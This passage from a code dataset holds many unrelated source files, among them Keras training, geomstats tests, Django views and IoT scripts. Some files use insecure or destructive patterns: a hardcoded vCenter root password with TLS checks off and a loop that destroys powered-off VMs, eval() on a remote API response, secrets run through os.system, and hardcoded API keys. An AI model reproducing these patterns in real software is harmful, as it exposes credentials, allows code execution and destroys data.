model.compile(loss=keras.losses.binary_crossentropy,optimizer=keras.optimizers.Adadelta(lr=1),metrics=['accuracy'])\n \n es = EarlyStopping(monitor='val_loss', min_delta=0.05, patience=30, verbose=0, mode='auto')\n hist = model.fit(train_X,trainHot_Y, batch_size=64, epochs=50, callbacks = [es], validation_split =0.2)\n\n test_loss,test_acc = model.evaluate(test_X, testHot_Y, batch_size=64)\n \n# print(hist.history)\n plt.ylim(0.5, 1)\n plt.plot(hist.history['acc'])\n plt.plot(hist.history['val_acc'])\n plt.ylabel('Accuracy')\n plt.title('Test Accuracy = '+str(test_acc))\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Validation'], loc='upper left')\n plt.savefig(\"result/accuracy.png\")\n plt.close()\n\n # Plot training & validation loss values\n plt.ylim(0, 0.5)\n plt.plot(hist.history['loss'])\n plt.plot(hist.history['val_loss'])\n plt.title('Test Loss = '+str(test_loss))\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Validation'], loc='upper left')\n plt.savefig(\"result/loss.png\")\n\n # Save model\n model.save_weights('result/weights.h5')\n return model\nvgg_like(train_X, trainHot_Y, test_X, testHot_Y)\n","sub_path":"models/VGG/vgglike.py","file_name":"vgglike.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"271574192","text":"import time\r\n\r\n# Function: runTimer\r\n# Desc: Utilizes time.sleep to run a countdown timer\r\ndef runTimer( hours, minutes ):\r\n\r\n\t# initialize the seconds counter\r\n\tseconds = 0\r\n\r\n\t# calculate total duration in seconds\r\n\tduration = int(( hours * 3600 ) + ( minutes * 60 ))\r\n\r\n\t# iterate through duration ( 0 to duration )\r\n\tfor i in range(duration):\r\n\t\t# roll over: borrow from minutes first, then from hours\r\n\t\tif seconds == 0:\r\n\t\t\tif minutes != 0:\r\n\t\t\t\tminutes = minutes - 1\r\n\t\t\t\tseconds = 60\r\n\t\t\telif hours != 0:\r\n\t\t\t\thours = hours - 1\r\n\t\t\t\tminutes = 59\r\n\t\t\t\tseconds = 60\r\n\r\n\t\t# decrement seconds\r\n\t\tseconds = seconds - 1\r\n\r\n\t\t# wait for 1 second\r\n\t\ttime.sleep(1)\r\n\r\n\t\t# output current timer countdown\r\n\t\tprint( hours, \":\", minutes, \":\", seconds )","sub_path":"timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"87578353","text":"\"\"\"Unit tests for the Poisson manifold.\"\"\"\n\nfrom scipy.stats import poisson\n\nimport geomstats.backend as gs\nimport tests.conftest\nfrom tests.conftest import Parametrizer, np_backend\nfrom tests.data.poisson_data import PoissonMetricTestData, PoissonTestData\nfrom tests.geometry_test_cases import OpenSetTestCase, RiemannianMetricTestCase\n\nNOT_AUTODIFF = np_backend()\n\n\nclass TestPoisson(OpenSetTestCase, metaclass=Parametrizer):\n testing_data = PoissonTestData()\n\n def test_belongs(self, point, expected):\n self.assertAllClose(self.Space().belongs(point), expected)\n\n def test_random_point(self, point, expected):\n self.assertAllClose(point.shape, expected)\n\n def test_sample_shape(self, point, n_samples, expected):\n self.assertAllClose(self.Space().sample(point, n_samples).shape, expected)\n\n @tests.conftest.np_and_autograd_only\n def test_point_to_pdf(self, point, n_samples):\n point = gs.to_ndarray(point, 1)\n n_points = point.shape[0]\n pmf = self.Space().point_to_pdf(point)\n point_to_sample = point[0] if point.ndim > 1 else point\n samples = 
gs.to_ndarray(self.Space().sample(point_to_sample, n_samples), 1)\n result = gs.squeeze(pmf(samples))\n pmf = []\n for i in range(n_points):\n pmf.append(gs.array([poisson.pmf(x, point[i]) for x in samples]))\n expected = gs.squeeze(gs.stack(pmf, axis=0))\n self.assertAllClose(result, expected)\n\n\nclass TestPoissonMetric(RiemannianMetricTestCase, metaclass=Parametrizer):\n skip_test_parallel_transport_ivp_is_isometry = True\n skip_test_parallel_transport_bvp_is_isometry = True\n skip_test_exp_ladder_parallel_transport = True\n skip_test_riemann_tensor_shape = NOT_AUTODIFF\n skip_test_ricci_tensor_shape = NOT_AUTODIFF\n skip_test_scalar_curvature_shape = NOT_AUTODIFF\n skip_test_covariant_riemann_tensor_is_skew_symmetric_1 = NOT_AUTODIFF\n skip_test_covariant_riemann_tensor_is_skew_symmetric_2 = NOT_AUTODIFF\n skip_test_covariant_riemann_tensor_bianchi_identity = NOT_AUTODIFF\n skip_test_covariant_riemann_tensor_is_interchange_symmetric = NOT_AUTODIFF\n skip_test_sectional_curvature_shape = NOT_AUTODIFF\n testing_data = PoissonMetricTestData()\n\n def test_squared_dist(self, space, point_a, point_b, expected):\n space.equip_with_metric(self.Metric)\n self.assertAllClose(space.metric.squared_dist(point_a, point_b), expected)\n\n def test_metric_matrix(self, space, point, expected):\n space.equip_with_metric(self.Metric)\n self.assertAllClose(space.metric.metric_matrix(point), expected)\n\n def test_geodesic_symmetry(self, space):\n space.equip_with_metric(self.Metric)\n point_a, point_b = space.random_point(2)\n path_ab = space.metric.geodesic(initial_point=point_a, end_point=point_b)\n path_ba = space.metric.geodesic(initial_point=point_b, end_point=point_a)\n t = gs.linspace(0.0, 1.0, 10)\n self.assertAllClose(path_ab(t), path_ba(1 - t))\n","sub_path":"tests/tests_geomstats/test_poisson.py","file_name":"test_poisson.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"414806016","text":"# coding: utf-8\n\"\"\"\nBase para desarrollo de modulos externos.\nPara obtener el modulo/Funcion que se esta llamando:\n GetParams(\"module\")\n\nPara obtener las variables enviadas desde formulario/comando Rocketbot:\n var = GetParams(variable)\n Las \"variable\" se define en forms del archivo package.json\n\nPara modificar la variable de Rocketbot:\n SetVar(Variable_Rocketbot, \"dato\")\n\nPara obtener una variable de Rocketbot:\n var = GetVar(Variable_Rocketbot)\n\nPara obtener la Opcion seleccionada:\n opcion = GetParams(\"option\")\n\n\nPara instalar librerias se debe ingresar por terminal a la carpeta \"libs\"\n \n pip install -t .\n\n\"\"\"\nimport sys\nimport os\nimport requests\nbase_path = tmp_global_obj[\"basepath\"]\ncur_path = base_path + 'modules' + os.sep + 'pdf2word' + os.sep + 'libs' + os.sep\nsys.path.append(cur_path)\nprint(cur_path)\nimport groupdocs_conversion_cloud\n\n\"\"\"\n Obtengo el modulo que fue invocado\n\"\"\"\nmodule = GetParams(\"module\")\nglobal app_sid\nglobal app_key\n\nif module == \"pdf2word\":\n\n app_sid = GetParams(\"app_sid\")\n app_key = GetParams(\"app_key\")\n path_pdf = GetParams(\"path_pdf\")\n path_word = GetParams(\"path_word\")\n\n try:\n\n # Create instance of the API\n convert_api = groupdocs_conversion_cloud.ConvertApi.from_keys(app_sid, app_key)\n file_api = groupdocs_conversion_cloud.FileApi.from_keys(app_sid, app_key)\n\n # upload soruce file to storage\n filename = '02_pages.pdf'\n remote_name = '02_pages.pdf'\n output_name = 'sample.docx'\n strformat 
= 'docx'\n\n request_upload = groupdocs_conversion_cloud.UploadFileRequest(path_pdf, path_pdf)\n response_upload = file_api.upload_file(request_upload)\n\n # Convert PDF to Word document\n settings = groupdocs_conversion_cloud.ConvertSettings()\n settings.file_path = path_pdf\n settings.format = strformat\n settings.output_path = output_name\n\n loadOptions = groupdocs_conversion_cloud.PdfLoadOptions()\n loadOptions.hide_pdf_annotations = True\n loadOptions.remove_embedded_files = False\n loadOptions.flatten_all_fields = True\n\n settings.load_options = loadOptions\n\n convertOptions = groupdocs_conversion_cloud.DocxConvertOptions()\n #convertOptions.from_page = 2\n #convertOptions.pages_count = 2\n\n settings.convert_options = convertOptions\n settings.output_path = \"converted\\\\todocx\"\n\n request = groupdocs_conversion_cloud.ConvertDocumentRequest(settings)\n response = convert_api.convert_document(request)[0].url\n\n #print(\"Document converted successfully: \" + str(response))\n\n url_ = str(response)\n\n url_token = \"https://api.groupdocs.cloud/connect/token\"\n\n payload = \"client_id=\"+app_sid+\"&client_secret=\"+app_key+\"&grant_type=client_credentials\"\n headers = {\n 'Content-Type': \"application/x-www-form-urlencoded\",\n 'Accept': \"application/json\"\n }\n\n response = requests.request(\"POST\", url_token, data=payload, headers=headers)\n\n #print('TOKEN',response.text)\n\n token_ = eval(response.text)\n key, val = next(iter(token_.items()))\n token_ = str(val)\n\n headers = {\n 'Authorization': \"Bearer \"+token_+\"\"\n }\n\n response = requests.request(\"GET\", url_, headers=headers)\n\n #print('DOWNLOAD',response.text)\n\n with open(path_word, \"wb\") as f:\n f.write(response.content)\n f.close()\n\n except Exception as e:\n PrintException()\n raise e\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"649557625","text":"import json\nimport logging\n\nfrom AnalysisEngine import Util\nfrom AnalysisEngine.TwitterObj import Status\nfrom AnalyticsService.Analytics.Analytics import Analytics\n\n\nclass TD_TotalTweets(Analytics):\n _logger = logging.getLogger(__name__)\n\n _options = [\"Minute\",\"Hour\",\"Day\",\"Week\"]\n\n __type_name = \"Total Tweet Time Distribution\"\n __arguments = [{\"name\": \"timeInterval\", \"prettyName\": \"Time interval\", \"type\": \"enum\", \"options\": _options,\n \"default\": \"Hour\"}]\n\n @classmethod\n def get_args(cls):\n return cls.__arguments + super(TD_TotalTweets, cls).get_args()\n\n @classmethod\n def get_type(cls):\n return cls.__type_name\n\n ####################################################################################################################\n\n @classmethod\n def get(cls, analytics_meta, gridfs, db_col, args, schema_id):\n\n time_interval = args[\"timeInterval\"]\n\n if time_interval not in cls._options:\n cls._logger.exception(\"Wrong time quantum given\")\n return False\n\n date_field = \"$\" + Status.SCHEMA_MAP[schema_id][\"ISO_date\"]\n p1, p2 = Util.get_date_projection(date_field, time_interval)\n g1 = {\"$group\": {\"_id\": \"$date\",\"count\": {\"$sum\": 1}}}\n s1 = {\"$sort\": {\"_id.dt\": 1}}\n p3 = {\"$project\": {\"dt\": \"$_id\", \"count\": \"$count\", \"_id\": 0}}\n\n c = db_col.aggregate([{\"$project\": p1},{\"$project\": p2},g1,s1,p3], allowDiskUse = True)\n\n result_lst = list(c)\n x_values = set()\n for l in result_lst:\n x_values.add(l[\"dt\"])\n\n 
result = {\"details\": {\"chartType\": \"msline\",\n \"chartProperties\": {\"yAxisName\": \"Tweets per \" + time_interval.lower(),\n \"xAxisName\": \"Date (UTC)\",\n \"caption\": \"Tweet Rate over Time\",\n \"labelStep\": min(1,int(len(x_values) / 20.0))}},\n \"data\": {\"categories\": sorted(x_values),\"values\":[{\"_id\": \"ALL\",\"data\":result_lst}]}}\n\n\n cls.create_chart(gridfs, analytics_meta, result)\n\n cls.export_json(analytics_meta, json.dumps(result, default = Util.date_encoder), gridfs)\n\n return True\n","sub_path":"server/src/AnalyticsService/Analytics/TimeStats/TD_TotalTweets.py","file_name":"TD_TotalTweets.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"363884164","text":"#coding=utf-8\nfrom pyVmomi import vim\nimport sys,time\n\"\"\"删除虚拟机\"\"\"\ndef create_vcenter_si():\n vcenter_ip = '192.168.134.98'\n vcenter_user = 'root'\n vcenter_pwd = 'pass1234!@#$'\n vcenter_port = 443\n si = None\n\n import ssl\n from pyVim import connect\n import atexit\n ssl_context = ssl.create_default_context()\n ssl_context.check_hostname = False\n ssl_context.verify_mode = ssl.CERT_NONE\n\n try:\n si = connect.SmartConnect(host=vcenter_ip, user=vcenter_user, pwd=vcenter_pwd,\n port=vcenter_port, sslContext=ssl_context)\n atexit.register(connect.Disconnect, si)\n except Exception as e:\n print(str(e))\n return si\n\ndef main():\n si = create_vcenter_si()\n content = si.RetrieveServiceContent()\n objView = content.viewManager.CreateContainerView(content.rootFolder,\n [vim.ComputeResource],\n True)\n vmList = objView.view\n objView.Destroy()\n\n for host in vmList:\n if host.name == \"192.168.134.21\":\n objView = content.viewManager.CreateContainerView(host,\n [vim.VirtualMachine],\n\n True)\n vmList = objView.view\n objView.Destroy()\n for vm in vmList:\n print(vm.name)\n # vm.PowerOff()\n if not vm.resourcePool is None:\n try:\n if vm.runtime.powerState == \"poweredOff\":\n vm.Destroy()\n time.sleep(1)\n else:\n print(\"请先运行关闭虚拟机脚本,再来执行本程序\")\n except:\n errormsg = sys._getframe().f_code.co_filename, sys._getframe().f_code.co_name, sys._getframe().f_lineno\n print(errormsg)\n\n\nif __name__ == \"__main__\":\n main()\n print(\"DOing all.....\")","sub_path":"delete/host_delete_vm.py","file_name":"host_delete_vm.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"20611236","text":"from django.shortcuts import render, redirect\nfrom .models import Item\nfrom ..loginApp.models import User\nfrom django.contrib import messages\n\n\n# Create your views here.\ndef index(request):\n\tif \"id\" not in request.session:\n\t\treturn redirect(\"login_page\")\n\n\tuser = User.objects.get(id=request.session[\"id\"])\n\n\tcontext = {\n\t\t\"items_on\": Item.objects.filter(added_by=user) | Item.objects.filter(wishlistitems__id=user.id),\n\t\t\"items_off\": Item.objects.exclude(added_by=user).exclude(wishlistitems__id=user.id),\n\t\t\"name\": user.name,\n\t}\n\treturn render(request, \"secondApp/index.html\", context)\n\ndef show(request, id):\n\tif \"id\" not in request.session:\n\t\treturn redirect(\"login_page\")\n\t\n\tuser = User.objects.get(id=request.session[\"id\"])\n\tcontext = {\n\t\t\"items_on\": Item.objects.filter(added_by=user) | Item.objects.filter(wishlistitems__id=user.id),\n\t\t\"items_off\": Item.objects.exclude(added_by=user).exclude(wishlistitems__id=user.id),\n\t\t\"name\": 
user.name,\n\t\t\"item\": Item.objects.get(id=id),\n\t}\n\treturn render(request, \"secondApp/show.html\", context)\n\ndef new(request):\n\tif \"id\" not in request.session:\n\t\treturn redirect(\"login_page\")\n\n\treturn render(request, \"secondApp/create.html\")\n\ndef join(request, id):\n\tif \"id\" not in request.session:\n\t\treturn redirect(\"login_page\")\n\t\n\titem = Item.objects.get(id=id)\n\tuser = User.objects.get(id=request.session[\"id\"])\n\n\titem.wishlistitems.add(user)\n\n\treturn redirect(\"dashboard\")\n\ndef create(request):\n\tItem.objects.create(item=request.POST[\"item\"], added_by=User.objects.get(id=request.session[\"id\"]))\n\treturn redirect(\"dashboard\")\n\ndef addtowishlist(request, id):\n\tif \"id\" not in request.session:\n\t\treturn redirect(\"login_page\")\n\n\t# Clicking the a tag for Add to my Wishlist: the item will be displayed on the top table and removed from the 'Other Users' Wish List' table\n\titem = Item.objects.get(id=id)\n\tuser = User.objects.get(id=request.session[\"id\"])\n\titem.wishlistitems.add(user)\n\treturn redirect(\"dashboard\")\n\ndef removefromwishlist(request, id):\n\tif \"id\" not in request.session:\n\t\treturn redirect(\"login_page\")\n\n\t# The remove a tag will remove the item from the table and display it on the Other Users' Wish List table again\n\titem = Item.objects.get(id=id)\n\tuser = User.objects.get(id=request.session[\"id\"])\n\titem.wishlistitems.remove(user)\n\treturn redirect(\"dashboard\")\n\ndef delete(request, id):\n\t# The delete a tag will remove the item from the database\n\tItem.objects.get(id=id).delete()\n\treturn redirect(\"dashboard\")\n","sub_path":"apps/secondApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"520067339","text":"\"\"\"\nClustering datasets may be found at\nhttp://cs.joensuu.fi/sipu/datasets/\n\"\"\"\nfrom progressivis import Scheduler, Every # , log_level\nfrom progressivis.core import aio\nfrom progressivis.cluster import MBKMeans, MBKMeansFilter\nfrom progressivis.io import CSVLoader\nfrom progressivis.vis import MCScatterPlot\nfrom progressivis.utils.psdict import PDict\nimport numpy as np\nimport os.path\nimport tempfile\nfrom progressivis.datasets.random import (\n generate_random_multivariate_normal_csv as gen_csv,\n)\n\ntry:\n s = scheduler\nexcept NameError:\n s = Scheduler()\n\n\ndir_name = os.path.join(tempfile.gettempdir(), \"progressivis_tmp_\")\n\nos.makedirs(dir_name, exist_ok=True)\n\nfile_name = os.path.join(dir_name, \"foobar.csv\")\n\ngen_csv(file_name, rows=99999, reset=True) # , header='_0,_1', reset=False)\n\ndata = CSVLoader(\n file_name, skipinitialspace=True, header=None, index_col=False, scheduler=s\n)\nn_clusters = 3\nmbkmeans = MBKMeans(\n columns=[\"_0\", \"_1\"],\n n_clusters=n_clusters,\n batch_size=100,\n tol=0.01,\n is_input=False,\n scheduler=s,\n)\nclasses = []\nfor i in range(n_clusters):\n cname = f\"k{i}\"\n filt = MBKMeansFilter(i)\n filt.create_dependent_modules(mbkmeans, data, \"table\")\n classes.append(\n {\n \"name\": cname,\n \"x_column\": \"_0\",\n \"y_column\": \"_1\",\n \"sample\": mbkmeans if i == 0 else None,\n \"input_module\": filt,\n \"input_slot\": \"table\",\n }\n )\n\nsp = MCScatterPlot(scheduler=s, 
classes=classes)\nsp.create_dependent_modules()\nfor i in range(n_clusters):\n cname = f\"k{i}\"\n sp[cname].min_value._table = PDict({\"_0\": -np.inf, \"_1\": -np.inf})\n sp[cname].max_value._table = PDict({\"_0\": np.inf, \"_1\": np.inf})\nmbkmeans.input.table = data.output.table\nmbkmeans.create_dependent_modules()\nsp.move_point = mbkmeans.moved_center # for input management\n\n\ndef myprint(d):\n if d[\"convergence\"] != \"unknown\":\n print(d)\n else:\n print(\".\", end=\"\")\n\n\nprn = Every(scheduler=s, proc=print)\nprn.input.df = mbkmeans.output.conv\n\nif __name__ == \"__main__\":\n # data.start()\n # s.join()\n aio.run(s.start())\n","sub_path":"examples/test_multiclass_k_clusters.py","file_name":"test_multiclass_k_clusters.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"128565568","text":"import requests\nimport json\n\npayload = {'q':\"potato and paneer\" , 'app_id':'6cbe9008' , 'app_key':'c300031de9d768b3b7ca4fa828c95e0e' , 'from':0 , 'to':50}\nr = requests.get(url=\"https://api.edamam.com/search\" , params=payload)\n\nprint(r.status_code);\nresponse = json.loads(r.content)\n# print(response)\ni=0\nfor y in response['hits']:\n print(y['recipe']['label']);\n ingr = y['recipe']['ingredients']\n for x in ingr:\n print(x['text'] + \" and the right amount is \" + str(x['weight']))\n print()\n i = i+1\n","sub_path":"api/edamam_api.py","file_name":"edamam_api.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"446724440","text":"import os\nimport numpy as np\n\nimport tensorflow as tf\n\nfrom layers import conv_layer\nfrom utils import init_weights, gen_data\n\n\nclass CryptoNet(object):\n def __init__(self, sess, model_path, msg_len=96):\n self.sess = sess\n self.model_path = model_path\n self.msg_len = msg_len\n self.key_len = self.msg_len\n self.N = self.msg_len\n\n self.build_model()\n self.load_model()\n\n def build_model(self):\n # Weights for fully connected layers\n self.w_alice = init_weights(\"alice_w\", [2 * self.N, 2 * self.N])\n\n # Placeholder variables for Message and Key\n self.msg = tf.placeholder(\"float\", [None, self.msg_len])\n self.key = tf.placeholder(\"float\", [None, self.key_len])\n\n # Alice's network\n # FC layer -> Conv Layer (4 1-D convolutions)\n self.alice_input = tf.concat([self.msg, self.key], 1)\n self.alice_hidden = tf.nn.sigmoid(tf.matmul(self.alice_input, self.w_alice))\n self.alice_hidden = tf.expand_dims(self.alice_hidden, 2)\n self.alice_output = tf.squeeze(conv_layer(self.alice_hidden, \"alice\"))\n\n def load_model(self):\n saver = tf.train.Saver()\n saver.restore(self.sess, self.model_path)\n print('model restored')\n\n def encrypt_hex(self, msg: list, key: list):\n assert len(msg) == self.msg_len, \\\n 'illegal msg (assert len(msg) == {})'.format(self.msg_len)\n assert len(key) == self.key_len, \\\n 'illegal key (assert len(key) == {})'.format(self.key_len)\n\n for i, j in zip(msg, key):\n assert not (i < -1 or i > 1 or j < -1 or j > 1), \\\n 'values should be in the range of [-1, 1]'\n\n msg = np.array(msg).reshape(-1, self.msg_len)\n key = np.array(key).reshape(-1, self.key_len)\n return self.sess.run(self.alice_output,\n feed_dict={self.msg: msg, self.key: key})\n\n def test_interactive(self):\n def convert(x):\n return np.array([[2*int(i)-1 for i in x]])\n\n while True:\n P = convert(input('MSG> ')[:self.msg_len])\n K = convert(input('KEY> 
')[:self.key_len])\n\n enc = self.sess.run(\n self.alice_output,\n feed_dict={self.msg: P, self.key: K})\n print('ENC>', ''.join(np.where(enc>0, '1', '0')))\n","sub_path":"server/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"514337323","text":"##############################################################################\n#\n# Copyright (c) 2008 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\nimport os\n\nEGG_INFO_CONTENT = \"\"\"Metadata-Version: 1.0\nName: %s\nVersion: 0.0\n\"\"\"\n\n\nclass Recipe:\n\n def __init__(self, buildout, name, options):\n self.buildout, self.name, self.options = buildout, name, options\n options.setdefault('zope2-part', 'zope2')\n options.setdefault('zope2-location', '')\n options.setdefault('additional-fake-eggs', '')\n options.setdefault('skip-fake-eggs', '')\n\n def install(self):\n zope2Location = self.options['zope2-location'].strip()\n if zope2Location == '':\n zope2Part = self.options['zope2-part'].strip()\n zope2Location = self.buildout[zope2Part]['location']\n\n developEggDir = self.buildout['buildout']['develop-eggs-directory']\n zopeLibZopeLocation = os.path.join(zope2Location, 'lib', 'python',\n 'zope')\n zopeLibZopeAppLocation = os.path.join(zope2Location, 'lib', 'python',\n 'zope', 'app')\n zopeLibs = [\"zope.%s\" % lib for lib in os.listdir(zopeLibZopeLocation)\\\n if os.path.isdir(os.path.join(zopeLibZopeLocation, lib))]\n zopeLibs += [\"zope.app.%s\" % lib for lib in os.listdir(zopeLibZopeAppLocation)\\\n if os.path.isdir(os.path.join(zopeLibZopeAppLocation, lib))]\n zopeLibs += [lib for lib in self.options['additional-fake-eggs'].split('\\n')]\n zopeLibs = [lib for lib in zopeLibs if lib not in\n self.options.get('skip-fake-eggs', '').split('\\n')]\n for zopeLib in zopeLibs:\n fakeLibEggInfoFile = os.path.join(developEggDir,\n '%s.egg-info' % zopeLib)\n fd = open(fakeLibEggInfoFile, 'w')\n fd.write(EGG_INFO_CONTENT % zopeLib)\n fd.close()\n return ()\n\n def update(self):\n return self.install()\n","sub_path":"z3c.recipe.fakezope2eggs/trunk/src/z3c/recipe/fakezope2eggs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"132823116","text":"from json import load as json_load\nfrom gc import collect as gc_collect\n\nimport time_utils\nfrom components import Components\nfrom network_wrapper import NetworkWrapper\nfrom utime import sleep\n\n\ndef calculate_temperature_color(internal_temperature, external_temperature):\n\n temperature_range = config['behavior']['temperature_range']\n external_temperature_allowed_offset = config['behavior']['external_temperature_allowed_offset']\n\n if internal_temperature > temperature_range['max']:\n return (True, False, False) # Hot - Red light\n elif internal_temperature < temperature_range['min']:\n return (False, False, True) # Cold - Blue light\n else:\n if 
external_temperature - external_temperature_allowed_offset > temperature_range['max']:\n return (True, False, False) # Hot - Red light\n elif external_temperature + external_temperature_allowed_offset < temperature_range['min']:\n return (False, False, True) # Cold - Blue light\n else:\n return (False, True, False) # Good - Green light\n\nwith open('config.json') as json_data:\n config = json_load(json_data)\n\nnw = NetworkWrapper(wifi_config=config['wifi'], ubidots_config=config['ubidots'])\n\ntime_utils.sync_ntp(nw)\ncomponents = Components()\ncomponents.rgb_led.set_colors(False, False, False)\n\nlast_notification_timestamp_sec = 0\n\nwhile True:\n sensors_data = nw.get_sensors_data()\n\n # Color-by-temperature LED\n r, g, b = calculate_temperature_color(float(sensors_data['internal-temperature']),\n float(sensors_data['external-temperature']))\n components.rgb_led.set_colors(r, g, b)\n\n # Water level display\n components.seven_segment.number(int(sensors_data['water-level']))\n\n # Drinking notification\n if time_utils.check_drinking_notification_required(sensors_data['last-drinking-timestamp'] // 1000,\n last_notification_timestamp_sec,\n config['behavior']['required_drinking_frequency_minutes'] * 60):\n components.buzzer.play_drinking_notification()\n last_notification_timestamp_sec = time_utils.unix_time()\n\n # Night light\n if sensors_data['light-level'] < config['behavior']['night_light_threshold']:\n components.led.on()\n else:\n components.led.off()\n\n gc_collect()\n\n sleep(config['behavior']['measurements_interval_sec'])\n","sub_path":"src/outputs/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"494913073","text":"import os\n\ndef get_secret(secret_name):\n try:\n with open('/run/secrets/{0}'.format(secret_name), 'r') as secret_file:\n return secret_file.read()\n except IOError:\n return None\n\nsshfs = get_secret(\"sign_bank_command_sshfs_images\")\nsshfs2 = get_secret(\"sign_bank_command_sshfs_videos\")\n\nos.system(sshfs)\nos.system(sshfs2)\n","sub_path":"signbank/dictionary/mountfs.py","file_name":"mountfs.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"221633134","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: Hogan\n\"\"\"\n\nimport jieba\nfrom wordcloud import WordCloud\nimport pandas as pd\nimport readFile\nimport matplotlib.pyplot as plt\nimport re\n\ndef jieba_cut(data):\n a = []\n worddict = {}\n for i in data:\n words = jieba.lcut(i)\n a.extend(words)\n for word in a:\n worddict.setdefault(word,0)\n worddict[word]+=1\n return worddict\n\ndef deal_with_meanless_word(data):\n mean_words = {}\n for i in data.keys():\n if len(i) > 1:# treat single-character tokens as meaningless; ideally a custom stop-word list would be defined\n mean_words[i] = data[i]\n return mean_words\n\n\ndef plot_mean_word(data):\n str_data = data.name.astype('str')\n popular_words = jieba_cut(str_data)\n mean_words = deal_with_meanless_word(popular_words)\n mean_words_df = pd.Series(mean_words).sort_values(ascending=False)\n mean_words_df_top15 = mean_words_df.head(15)\n print('top 15 mean words')\n print(mean_words_df_top15)\n \n plt.figure(figsize=(15,8))\n plt.title('Description keywords of the most popular rooms')\n mean_words_df_top15.plot(kind='bar')\n \n wordcloud_use = ' '.join(mean_words.keys())\n resultword=re.sub(\"[A-Za-z0-9]\", \"\",wordcloud_use) \n \n w = WordCloud(scale=4,background_color='white', font_path='SIMLI.TTF', \n max_words = 
2000,max_font_size = 20,random_state=20).generate(resultword[:200])\n w.to_file('result.jpg')\n \nif __name__ == '__main__':\n\n plot_mean_word(readFile.reviews_top90)\n\n\n","sub_path":"wordCloudPic.py","file_name":"wordCloudPic.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"256554916","text":"# -*- coding: utf-8 -*-\n'''\nCreated on :2018/6/8:14:56\n\n@author: yunxia.qiu\n'''\n\nfrom base_driver import BaseDriver\nfrom util.get_by_local import GetByLocal\nclass jssdk_class():\n def __init__(self,i):\n dr = BaseDriver()\n self.driver =dr.android_driver(i)\n self.loc=GetByLocal(self.driver)\n\n\n def open_app(self,url):\n # locate the input box\n self.input=self.loc.get_element('chrome_app','input_text')\n self.input.send_keys(url)\n\n def switch_js(self):\n contexts = self.driver.contexts\n for i in contexts:\n if 'webview' in i.lower():\n self.driver.switch_to.context(i)\n\n\n\n\n\n\n\n","sub_path":"jssdk_ui/base/jssdk_case.py","file_name":"jssdk_case.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"644631937","text":"import pymongo\nfrom flask import jsonify\nimport json\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n\nmydb = myclient[\"questions\"]\nmycol = mydb[\"questions\"]\n\nresult = None\n\nwith open('tmmQuestions.json') as f:\n result = json.load(f)\n\nif result is not None:\n for question in result[\"questions\"]:\n x = mycol.insert_one(question)\n print(x)\n","sub_path":"MongoPy.py","file_name":"MongoPy.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"640999569","text":"import numpy as np\nimport subprocess\nimport os\ndef odswiez_ekran():\n subprocess.call(\"cls\", shell=True)\ndef poczekaj(czas):\n cz=0\n while(cz library.days_to_signup:\n list_of_signed_up.append(library)\n days_to_ship -= library.days_to_signup\n # counts the books for this specific library\n for i in range(days_to_ship):\n # print(f\"Days left {days_to_ship}, index is {ind}\")\n for x in range(library.speed):\n # print(f\"{library.books_to_scan} and {library.list_of_books}\")\n if len(library.books_to_scan) == len(library.list_of_books):\n break\n\n while library.list_of_books[ind + x] in global_set_books:\n if ind < len(library.list_of_books) - library.speed - 2:\n # print(\"Book already scanned\")\n ind += 1\n else:\n break\n library.books_to_scan.append(library.list_of_books[ind + x])\n global_set_books.add(library.list_of_books[ind + x])\n if ind < 